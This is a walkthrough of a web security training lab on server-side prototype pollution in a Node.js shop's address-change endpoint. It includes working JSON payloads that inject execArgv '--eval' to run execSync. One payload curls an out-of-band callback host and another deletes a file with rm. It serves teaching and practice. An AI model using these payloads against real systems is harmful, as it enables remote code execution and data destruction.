Lab: Remote code execution via server side prototype pollution
Study the address change feature
After starting the exercise, the store should be similar to the one in the illustration.
First we log in to the store with our credentials wiener:peter. To do this, we click on the My account link and fill out the registration form.
After successful registration, we have access to our billing and delivery address. Here we change the content of the Line 1 text field from Vienna HQ to Hacker and Victim Inc.. Click on the Submit button to send the form.
In the next step, we switch to the Burp Proxy and open the HTTP history there. In the HTTP history we search for the request POST /my-account/change-address.
We see that when the form is sent, the data from the fields is sent to the server as JSON. The server responds with a JSON object, which represents our user. We send this request to the Burp Repeater. We use the key combination CTRL+R for this.
Identify a prototype pollution source
In Repeater, we add a new property to the JSON called __proto__, which contains an object with a json spaces property.
"__proto__": {
"json spaces":10
}The JSON in the request should look similar to the following code snippet.
{
"address_line_1":"Hacker and Victim Inc.",
"address_line_2":"One Wiener Way",
"city":"Wienerville",
"postcode":"BU1 1RP",
"country":"UK",
"sessionId":"5u6zXZqYKBhoJw57zCxYEyqChEmA9zms",
"__proto__": {
"json spaces":10
}
}After sending, we see in the Response section that our __proto__ property appears in the body (line 11). Our attempt at prototype pollution was therefore successful.
{
"username": "wiener",
"firstname": "Peter",
"lastname": "Wiener",
"address_line_1": "Hacker and Victim Inc.",
"address_line_2": "One Wiener Way",
"city": "Wienerville",
"postcode": "BU1 1RP",
"country": "UK",
"isAdmin": true,
"json spaces": 10
}Probe for remote code execution
In our browser we see a link with the name Admin panel.
When we open this link, we are taken to a page where there is a button called Run maintenance jobs.
If we click on this button, we receive the following information.
Apparently we start some jobs at the backend with the button. This is a classic example of a function that can create child node processes. Now let's try to infect the prototype with a malicious execArgv property that adds the --eval argument to the created child process. Let's use this to call the execSync() sink and pass a command that triggers an interaction with the public Burp Collaborator server. We now switch to the Burp Repeater and add the following property to our JSON.
"__proto__": {
"execArgv":[
"--eval=require('child_process').execSync('curl https://YOUR-COLLABORATOR-ID.oastify.com')" ]
}Make sure that you enter your Collaborator ID. To do this, open the Collaborator and click on the Copy to clipboard button.
The complete JSON in our request should now look like this:
{
"address_line_1":"Hacker and Victim Inc.",
"address_line_2":"One Wiener Way",
"city":"Wienerville",
"postcode":"BU1 1RP",
"country":"UK",
"sessionId":"T7yiqu3F2aJCjXMd1Jiktp38lKxGn5qJ",
"__proto__": {
"execArgv":[
"--eval=require('child_process').execSync('curl https://p0qxf36szaiz86p7xb3dit41tszjn9by.oastify.com')" ]
}
}We now send the request and switch to our browser. If we now click the Run maintenance jobs button again, we see that the jobs are no longer working.
Now we open our Burp Collaborator and see that we have received four DNS and two HTTP messages. The DNS interactions confirm the execution of remote code.
Craft an exploit
In our request, we change the command in our property from curl to rm. Our request now looks like this (line 10 contains the command rm):
{
"address_line_1":"Hacker and Victim Inc.",
"address_line_2":"One Wiener Way",
"city":"Wienerville",
"postcode":"BU1 1RP",
"country":"UK",
"sessionId":"T7yiqu3F2aJCjXMd1Jiktp38lKxGn5qJ",
"__proto__": {
"execArgv":[
"--eval=require('child_process').execSync('rm /home/carlos/morale.txt')" ]
}
}We send the request and switch to the Admin panel in the browser. We refresh the page and press the Run maintenance jobs button again. We have now deleted the user carlos and successfully completed the exercise.
Video Solution
Last updated